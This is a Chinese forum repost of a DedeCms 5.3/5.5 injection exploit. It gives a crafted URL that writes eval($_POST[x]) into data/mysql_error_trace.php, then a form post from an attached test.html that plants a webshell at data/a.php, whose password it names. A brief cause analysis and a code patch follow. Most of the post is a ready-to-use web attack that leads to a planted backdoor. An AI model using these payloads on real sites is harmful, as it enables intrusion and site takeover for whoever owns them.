• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    DedeCms注入漏洞 影响版本5.3、5.5Posted in php

    发布者: 404号房间 | 发布时间: 2025-6-27 15:42| 查看数: 106| 评论数: 0|帖子模式

    假设域名是:www.abc.com 攻击步骤如下:
    1. 访问网址:
    http://www.abc.com/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
    可看见以下错误信息

    注入成功

    2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。

    int(3) Error: Illegal double '1024e1024' value found during parsing
    Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

    3. 执行附件地址:dede.rar里的文件 test.html,注意 form 中 action 的地址是

    <form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>

    按确定后的看到第2步骤的信息表示文件木马上传成功。

    木马网址:http://www.abc.com/data/a.php
    密码:2006888

    漏洞分析:
    利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。

    解决方案:

    打开文件 include/dedesql.class.php
    找到代码
    @fwrite($fp, ‘<’.'?php’.”\r\n/*\r\n{$savemsg}\r\n*/\r\n?”.”>\r\n”);
    替换代码
    @fwrite($fp, ‘<’.'?php’.”\r\nexit;\r\n/*\r\n{$savemsg}\r\n*/\r\n?”.”>\r\n”);

    清空 data/mysql_error_trace.php 文件内容

    来源:https://www.jb51.net/hack/20659.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有账号?立即注册

    ×

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表